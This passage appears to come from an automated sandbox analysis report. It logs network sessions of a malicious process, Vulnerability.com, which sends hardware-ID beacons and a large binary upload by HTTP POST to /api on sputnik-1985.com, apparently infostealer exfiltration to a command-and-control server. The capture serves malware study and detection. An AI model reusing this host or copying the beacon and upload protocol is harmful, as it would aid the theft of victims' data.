2025-01-10 22:28:20 UTC	15331	OUT	Data Raw: 2d 2d 48 58 51 46 42 4f 56 41 57 50 51 50 34 58 4c 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 35 31 31 38 32 42 45 44 46 32 45 32 37 42 37 42 41 41 32 44 46 35 39 43 33 44 30 42 43 37 0d 0a 2d 2d 48 58 51 46 42 4f 56 41 57 50 51 50 34 58 4c 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 58 51 46 42 4f 56 41 57 50 51 50 34 58 4c 35 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d Data Ascii: --HXQFBOVAWPQP4XL52Content-Disposition: form-data; name="hwid"3951182BEDF2E27B7BAA2DF59C3D0BC7--HXQFBOVAWPQP4XL52Content-Disposition: form-data; name="pid"3--HXQFBOVAWPQP4XL52Content-Disposition: form-data; name="lid"hRjzG3--TRON--
2025-01-10 22:28:20 UTC	5229	OUT	Data Raw: d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
2025-01-10 22:28:41 UTC	1122	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ls42j24n422b1g7fohnuo7n3nn; expires=Tue, 06 May 2025 16:15:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nRe2H6OHCR5o4yQg9N3UpjY0ZID4PLhPCWDOjO70MYaGg6ZFTu6bydbEsgabtZ%2BzXtlVnVBCQ1zR6994XSCNxp2J1hXIxmgInMorFrXV401MgSeRotf6VPW1pZ6SOT2qgd10"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000197ebc754344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1708&rtt_var=696&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21521&delivery_rate=1511387&cwnd=47&unsent_bytes=0&cid=4db41de87dd04ff1&ts=20272&x=0"
2025-01-10 22:28:41 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:28:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49987	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:41 UTC	277	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZW4IP765VOG0RJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 5457 Host: sputnik-1985.com
2025-01-10 22:28:41 UTC	5457	OUT	Data Raw: 2d 2d 5a 57 34 49 50 37 36 35 56 4f 47 30 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 35 31 31 38 32 42 45 44 46 32 45 32 37 42 37 42 41 41 32 44 46 35 39 43 33 44 30 42 43 37 0d 0a 2d 2d 5a 57 34 49 50 37 36 35 56 4f 47 30 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 57 34 49 50 37 36 35 56 4f 47 30 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 5a 57 34 49 50 37 36 35 56 Data Ascii: --ZW4IP765VOG0RJContent-Disposition: form-data; name="hwid"3951182BEDF2E27B7BAA2DF59C3D0BC7--ZW4IP765VOG0RJContent-Disposition: form-data; name="pid"1--ZW4IP765VOG0RJContent-Disposition: form-data; name="lid"hRjzG3--TRON--ZW4IP765V
2025-01-10 22:28:42 UTC	1127	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=91on5pflodspdm4dqkqdjmhg9d; expires=Tue, 06 May 2025 16:15:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMQhjol45ge74Z9G8nC4LeGzBXaGVWj8h8KmOsVLo0n23%2B2rLDS%2BErmRv%2BEc9CQLYxdZHKDuhuHzoYojcwqxlx8hu39781Q7LzQQleksLIuGP1Q%2BaZmD%2FxZ3SVFliwYVC1hI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90001a0189b38cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1801&rtt_var=682&sent=7&recv=12&lost=0&retrans=0&sent_bytes=2839&recv_bytes=6370&delivery_rate=1596500&cwnd=243&unsent_bytes=0&cid=0b5f5bbc831c108e&ts=460&x=0"
2025-01-10 22:28:42 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:28:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49988	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:42 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=UXTCS1LNCOPNH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 918 Host: sputnik-1985.com
2025-01-10 22:28:42 UTC	918	OUT	Data Raw: 2d 2d 55 58 54 43 53 31 4c 4e 43 4f 50 4e 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 35 31 31 38 32 42 45 44 46 32 45 32 37 42 37 42 41 41 32 44 46 35 39 43 33 44 30 42 43 37 0d 0a 2d 2d 55 58 54 43 53 31 4c 4e 43 4f 50 4e 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 55 58 54 43 53 31 4c 4e 43 4f 50 4e 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 55 58 54 43 53 31 4c 4e 43 4f 50 4e Data Ascii: --UXTCS1LNCOPNHContent-Disposition: form-data; name="hwid"3951182BEDF2E27B7BAA2DF59C3D0BC7--UXTCS1LNCOPNHContent-Disposition: form-data; name="pid"1--UXTCS1LNCOPNHContent-Disposition: form-data; name="lid"hRjzG3--TRON--UXTCS1LNCOPN
2025-01-10 22:28:44 UTC	1123	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9icntivl8e5dgjpf4bgdv3c3s8; expires=Tue, 06 May 2025 16:15:22 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r467c6lhxIYcrKTSFbCSFUBR%2FiBoj581WFsfRZ8owNGABtaHpb3HmcQOwwh%2FpTquz9ptOZ9bwqmDqVuGRpyqS1YjZv7ehkqlYOjDwmbFgR2oieacn5DTr%2BxXBF8sE3Q9s5Xl"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90001a077d6cc327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1565&min_rtt=1564&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1829&delivery_rate=1852791&cwnd=189&unsent_bytes=0&cid=a376c71b385fa7a3&ts=2181&x=0"
2025-01-10 22:28:44 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-10 22:28:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49989	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
2025-01-10 22:28:45 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=ZIFZHGEDLTJTDBJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 578280 Host: sputnik-1985.com
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 2d 2d 5a 49 46 5a 48 47 45 44 4c 54 4a 54 44 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 35 31 31 38 32 42 45 44 46 32 45 32 37 42 37 42 41 41 32 44 46 35 39 43 33 44 30 42 43 37 0d 0a 2d 2d 5a 49 46 5a 48 47 45 44 4c 54 4a 54 44 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 49 46 5a 48 47 45 44 4c 54 4a 54 44 42 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 5a 49 46 5a 48 47 Data Ascii: --ZIFZHGEDLTJTDBJContent-Disposition: form-data; name="hwid"3951182BEDF2E27B7BAA2DF59C3D0BC7--ZIFZHGEDLTJTDBJContent-Disposition: form-data; name="pid"1--ZIFZHGEDLTJTDBJContent-Disposition: form-data; name="lid"hRjzG3--TRON--ZIFZHG
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 44 52 fc ee af 4c c5 ef 23 16 c9 b9 1a e7 46 a2 f5 0f 64 41 75 05 be fb 09 fd 81 05 9a e4 04 d0 ac 30 70 19 04 fe 2a ad 18 44 82 17 f6 52 b5 b3 ad c4 ea da 5b 33 16 e9 fe bc bf 5f 08 82 8f bf 2b cb 5f a9 c1 38 0f 0f ea 79 4b fe 8c f1 ff 42 6a d2 97 3d 3b 11 26 a5 fd 2f bf fb 8f 54 fb 79 fd 72 7f ee cf 0f f4 aa f0 40 76 45 9a ee 2c ba c2 4a 2e b2 1a 77 fe 07 50 9a 1e ff bf db 4d fe ef 03 3c 44 07 e0 cc 14 05 5a 09 84 7e 43 58 b0 f1 41 fb 68 46 4d 26 28 8c 77 12 bd d0 d0 6f 17 92 fd 98 fb 33 46 08 e9 4f 65 bd 4e db 11 00 52 8d b4 60 78 7c b0 17 ec 8c 81 1e 7b 43 fa ae ec 3d 3d cd c1 18 77 5a a3 3c ee f8 aa b3 1c ea 72 85 73 c7 6e db bc 05 d4 12 29 01 e1 f6 51 89 c2 4c 5f f3 d8 43 ed 9c 48 3a 3a 89 eb 75 2f 45 f4 08 e7 7a 3b 0a 02 bf 5f 99 4e ee a7 35 4e 9f Data Ascii: DRL#FdAu0p*DR[3_+_8yKBj=;&/Tyr@vE,J.wPM<DZ~CXAhFM&(wo3FOeNR`x\|{C==wZ<rsn)QL_CH::u/Ez;_N5N
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: c1 8d dd 8a 7c 47 6f ed 06 c8 9d 11 a3 5b 0f 6a d6 de e5 8d 6c 4f 67 2e ff a9 5b b0 6a ed 12 85 bd 60 bf 8b 14 60 21 00 ee 50 d5 c3 e5 d1 00 1f 62 c2 a3 95 78 8d 1c d1 bd 0c 4f b1 b9 f6 91 c4 9f 29 55 36 a2 32 f3 3a d4 39 ab 11 6c 8e e2 b2 bf d1 76 6e 08 75 de d0 0f 41 df 25 f8 a4 3a 56 aa 61 e1 97 11 e3 99 7d 49 78 f6 f3 0a 7f 0b 6d 90 56 1a 66 89 a0 e5 15 22 00 5b 0f bb 33 28 cc 7a 00 e8 56 06 ff 9b 64 e7 80 a5 1f 20 b3 10 e4 7e 49 39 78 b6 89 22 c8 75 7b 92 ff df be ed f2 a9 e2 c9 e6 0a 90 00 90 44 de f3 b9 cf 13 07 22 bb 34 64 50 90 00 eb 83 b8 e8 a4 48 07 70 de 09 67 29 8e 48 3b 40 87 42 2f 80 81 c7 d5 4c 8f 62 8b 82 57 cd f9 97 4e dd 9b 87 5d 30 58 93 6d bb 2b bb af 20 6e a8 cb 80 07 98 a5 7b a3 85 69 0e d9 a8 6e 33 38 26 68 36 22 3d 65 48 db 51 c5 Data Ascii: \|Go[jlOg.[j``!PbxO)U62:9lvnuA%:Va}IxmVf"[3(zVd ~I9x"u{D"4dPHpg)H;@B/LbWN]0Xm+ n{in38&h6"=eHQ
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 7f ed 36 63 48 d9 6b fc 41 d3 3e c2 ac 15 c3 47 c4 e9 2c 1d 42 78 ec 3d 22 e3 da bf cb 40 dd 76 0e 1f f9 a8 bc 9e e5 92 10 ff 4b 03 a9 e1 33 88 8e 51 e8 ce d0 30 5b fd 25 6f c7 4b b8 32 91 3a 91 66 59 a3 9e 12 ee d2 e9 3a 76 69 2b d9 57 a4 1d a3 f1 a7 0f 4b ec e6 78 2a 88 1d 49 4d 63 79 d4 ee 4e f7 70 76 8a d8 21 b2 69 a1 82 7c 55 2b 72 f5 0c 5d 15 b5 63 4f 6a 62 b2 3a 6b 62 66 be 9a 95 c9 20 4f 34 a4 ff c5 85 0f a1 fa 13 bf 6d d9 0f 32 d2 65 c2 2f 97 09 d4 57 6e 31 d7 47 c6 62 66 f8 a9 ed 84 af 0d 67 bf 6e 76 7c d1 d8 77 4b 92 96 ba f4 2a 2d 3d c4 0c 81 80 a0 98 58 99 02 1b c4 85 6b 0b 28 72 18 04 31 65 c0 55 ac ae 24 44 d4 d2 28 50 7f 68 72 fd fc a8 e9 9e a3 a0 97 1f a3 9a ca 31 cf 07 19 14 ea e5 1f a6 15 e1 5f f5 73 4a ff f4 35 d4 b9 fd 41 1e 74 d5 61 Data Ascii: 6cHkA>G,Bx="@vK3Q0[%oK2:fY:vi+WKxIMcyNpv!i\|U+r]cOjb:kbf O4m2e/Wn1Gbfgnv\|wK-=Xk(r1eU$D(Phr1_sJ5Ata
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 8a 20 ff 3a fe ff df 8e f1 bf 4b 32 37 f8 58 06 7e 9c 22 98 83 02 3c 28 e8 14 1f f5 7a 03 12 17 f1 06 82 ed 88 aa cf 52 e4 cc 90 b8 ae 56 5b 2e c0 c3 29 33 07 c9 39 55 52 bd bc 6b ec 20 05 3a 8a a2 fb e1 55 42 3c 5e 86 af 24 0f 5f 67 48 13 e8 ba 99 ef cf 8c be 1a 6d c6 84 15 de 56 b9 f8 a8 24 e2 33 5a 77 72 16 99 53 04 17 fe c1 87 40 97 bb 79 a8 d8 d6 8c 2a 01 41 68 0c 53 8e 8e 40 91 55 11 3f 6f 16 98 07 1c 2f 39 ad d1 1c e2 b7 1e 6d 4f 6e b5 e9 fe 02 11 d0 f7 c5 41 c7 af ec 35 a0 1c 4d b9 d7 ea ea 44 5b e9 d4 d5 70 db ea 9b 56 77 56 30 49 af c3 b7 f0 46 e9 ca c0 56 c5 bf 14 c2 80 40 2e 68 d7 06 03 c5 0f ba 66 b8 9b 14 9c 15 80 fc e8 c8 a0 8d c2 f7 16 8e d2 a1 37 f5 56 03 e1 9e 7f 27 33 ec 0b 2d f9 39 76 e0 fa 69 02 16 ed ba c2 0d 29 38 90 00 29 16 21 c2 Data Ascii: :K27X~"<(zRV[.)39URk :UB<^$_gHmV$3ZwrS@y*AhS@U?o/9mOnA5MD[pVwV0IFV@.hf7V'3-9vi)8)!
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 52 17 4c 45 b5 d4 7c 1b d6 1e 22 d6 23 69 a3 85 3b 66 3e f7 53 fe 14 ca 0c 78 3b 47 05 5f 7b 34 aa 31 40 e2 e0 13 86 e4 9a b5 fe 36 23 bb 04 e2 28 e7 59 6a 9c 8f 34 e3 5b db a8 ad a9 59 6a 0b 6a 99 66 e7 04 2f a5 47 a5 0b 4c 3e 62 fc ac 46 f4 ff 59 4a 5f 4c a5 95 6b bc a3 4a 68 29 db d6 23 db ac ce 48 45 d1 35 4a e2 57 1c fd 71 cb 8a 7d a2 95 95 62 b6 d2 40 42 b6 88 48 b2 f4 db 89 af 1f 0b 5b 78 25 3f 15 c3 80 5d ab 79 eb db bd f4 5b dc 17 8e 8d b5 61 8c e9 ad 6f 95 f0 34 ae 43 1f 76 e2 78 28 b3 aa 24 1e ca df 57 25 f1 35 44 7c 67 7f fe 53 a8 ce d8 19 57 f7 be 97 e0 4b 3a ea bb d5 ed e6 9c 26 f9 70 4d 12 c5 f8 bb 65 e1 5b 70 c5 96 dd 06 33 c7 32 44 7c 24 ee 12 b8 32 9c 88 fa 48 be 70 7a 22 53 1d 0f cd c6 8c da e6 d4 44 71 dd 23 52 38 1a e7 59 e6 10 42 c8 Data Ascii: RLE\|"#i;f>Sx;G_{41@6#(Yj4[Yjjf/GL>bFYJ_LkJh)#HE5JWq}b@BH[x%?]y[ao4Cvx($W%5D\|gSWK:&pMe[p32D\|$2Hpz"SDq#R8YB
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 56 dd 89 ea ac c0 91 c1 9a 03 80 30 a1 c8 fa 51 2d 25 62 b4 da a7 de be 69 b2 59 32 49 8d ba 69 f1 68 75 7e 60 66 75 bb bc 66 bb 4f 35 81 d1 cd cd 67 88 76 56 87 dc c0 01 b3 64 43 41 b1 17 62 e0 47 54 96 4a dc 00 43 0b 44 4c ed 2d 3f 8b 03 3b 44 50 b2 81 57 5b b2 8f 9b ca da d3 67 4c 48 77 03 6c 2b 57 b3 97 f3 f4 b3 b8 2b ae db 2f 2f 43 60 7d f6 6f de d9 bf 88 40 c7 00 c9 10 3a dd c9 3d 0f 47 13 38 8b 8f 67 db 89 27 47 4e cf 51 34 71 b7 97 d6 c2 3b 25 2f 9c 71 be 9f 63 81 17 a9 5c 5a be 19 c0 cf b9 2b 77 5b e6 98 90 d5 97 8b 5a cb ce dc ab 8f 1a 3d 75 46 37 93 43 07 7b 46 d0 85 d6 17 7c 6b 6d 72 c7 b7 e4 1f f4 2c 7c 84 90 e2 35 80 62 8d af fd 08 d9 8f 8d b5 d4 69 60 18 da b5 02 b6 a1 b3 c8 ff 2e 41 8c 77 d9 b9 ec 48 15 69 78 2c a3 09 f7 3f d0 c5 04 4c fc Data Ascii: V0Q-%biY2Iihu~`fufO5gvVdCAbGTJCDL-?;DPW[gLHwl+W+//C`}o@:=G8g'GNQ4q;%/qc\Z+w[Z=uF7C{F\|kmr,\|5bi`.AwHix,?L
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 77 53 b8 6f 66 78 26 0a 05 e3 49 2e 22 23 df ff dd 3e 03 43 37 f7 67 f2 16 e0 d3 9e 7f 86 e4 2d 7f 17 26 32 d1 b0 00 86 7f 51 06 dd 35 31 39 ef c6 b2 1d 88 d1 57 d2 82 4c c4 fb 4a a7 cf 37 b8 2a 67 cf 4f a4 9b 38 28 5e 56 7e ae 3f af d6 e1 96 60 5b af 24 1f a1 7b 59 38 89 a7 09 f9 85 36 12 b6 b7 9c 76 99 b4 4c 1c 09 ef c7 07 b9 43 d9 95 ab 6a e5 3f b1 c5 8f 23 c7 ee 9b e9 47 f0 40 6f 86 ba 47 46 54 e9 5f 89 dc cc a0 d2 67 7e 7f 4a bc bf 45 66 a8 06 bd 91 24 d3 7b c5 05 bb 7f 67 da 4a bc 3f 5d 5e 49 4f 11 24 fb 9c fe fd e7 6e 08 08 76 f6 f3 61 c0 23 e5 cc c7 ae c8 ec 44 ea ed 79 4d 76 8d 38 d7 d3 bf ec 49 9d 77 c5 0d 9e 96 c3 ea d1 57 fa 96 c7 4c 21 bb e3 ee f6 d7 b9 ff 7e af 78 1c a5 d1 2d 59 27 08 ef e5 78 33 58 18 dc ad 55 f1 70 fc f9 ad ec 30 e3 48 09 Data Ascii: wSofx&I."#>C7g-&2Q519WLJ7*gO8(^V~?`[${Y86vLCj?#G@oGFT_g~JEf${gJ?]^IO$nva#DyMv8IwWL!~x-Y'x3XUp0H
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: 88 7d c9 d7 f1 18 82 bb 86 73 db 68 47 49 1e b0 d2 04 77 17 21 ed 3a 78 cd c3 ba 21 d6 47 d7 fa 6e 6c d6 68 e6 f1 07 ba 1e 5f 6d b4 8d 1d 65 3c 50 94 6f ab 21 7a 8c 1d c6 45 ab 76 01 ee e4 7c d4 49 3c 5c 74 bb 63 ae 9e 6d e1 9e 9d 88 3b b0 53 1e 61 be c2 bc c6 83 a8 2a 64 e5 cb 9f e3 a4 91 52 08 89 e3 c2 5f c6 e9 fa 27 8e 8b 68 38 c2 b2 73 57 c7 6c 23 08 a3 b5 02 dc 5b c0 e6 ab b1 04 40 70 de 8c 5a a3 2d 08 b0 8b b7 48 f6 f1 c8 df 6b 27 6d b3 d1 31 6b e1 76 66 f5 77 31 94 b4 0d 4c cc f8 90 2e 46 ab 15 91 90 44 6c 65 22 59 c8 d9 9f 7f e3 e4 87 f9 3e 7e 27 1f 8f 8d 32 a3 30 9f 89 33 ce 61 f3 08 c5 65 5b 89 ca 4b 5f 27 35 db 1b 57 15 75 5e ed a0 a2 22 6e 4b 11 fa c2 df 1d c6 7b 02 d8 5f e4 d0 d1 56 e6 94 7e db cf 56 d2 93 5d 32 f7 cd 55 26 cf f5 e4 92 3b 2a Data Ascii: }shGIw!:x!Gnlh_me<Po!zEv\|I<\tcm;SadR_'h8sWl#[@pZ-Hk'm1kvfw1L.FDle"Y>~'203ae[K_'5Wu^"nK{_V~V]2U&;
2025-01-10 22:28:45 UTC	15331	OUT	Data Raw: dd 62 e8 5f 0e 48 9e 5f bb 79 8a 74 8e 1f e4 93 e8 e6 0a 70 0d ad 8e ce c9 8f 5b b9 08 fd ef b8 45 5e 99 f5 11 8f 7f 7b 6b fd db e6 d2 cf 5d 80 b7 da 04 20 61 01 e6 9d 7b dc 8b 03 16 b3 a9 8c 22 d1 e1 ac 0b 66 2f ea 01 b5 24 89 5a 2d 06 6e ec b4 cb a9 f7 f2 6a e0 19 93 1d ba 18 f0 bc 53 4c 3e a7 7a 9a e3 f6 a4 b9 f8 08 e7 c6 f7 58 29 78 2f eb 40 6a 8c 04 c0 77 e0 18 38 02 be 1b 05 cb 6e 7d d1 fe d2 c2 cb 74 a6 11 d1 e5 ce 16 97 2c 50 b0 6e 6c a7 70 4b 9e e6 31 60 69 91 dd 50 af b2 16 92 dc 82 24 96 a3 54 7b dc 90 5a ca 4a 7d 54 75 96 aa bc d0 fd 45 17 04 a9 92 03 b6 24 c0 87 75 33 41 43 99 a9 57 c5 7c 79 98 c5 cc e3 d1 1b a7 de 60 af 0c 35 a0 75 b7 e8 21 fd 3d 26 f9 e7 4a 34 93 e0 08 29 d0 db 80 07 c4 7c 80 12 af 3e 40 57 a2 29 25 9b 28 de d4 66 ee 8d 32 Data Ascii: b_H_ytp[E^{k] a{"f/$Z-njSL>zX)x/@jw8n}t,PnlpK1`iP$T{ZJ}TuE$u3ACW\|y`5u!=&J4)\|>@W)%(f2
2025-01-10 22:28:47 UTC	1133	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:28:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1shvv0hehiam8bo87hr1ifvfrc; expires=Tue, 06 May 2025 16:15:26 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bqz0O%2BvXt12RlxGE0qbls9b0SZts2i4iOlk9wZJwLfKHrTP%2FdRLqwwqDayjG8yx5zGbiLYogPgNemJNmBz6izYiejwDZgO%2BqFwJWvUIbHWbzlO6nGDTHTRS%2B0yxRX8hQ26ex"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90001a1a2c5872b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1771&rtt_var=693&sent=199&recv=595&lost=0&retrans=0&sent_bytes=2840&recv_bytes=580846&delivery_rate=1546610&cwnd=217&unsent_bytes=0&cid=2abf3c6eaff33e94&ts=1604&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49990	104.21.32.1	443	2316	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Timestamp	Bytes transferred	Direction	Data
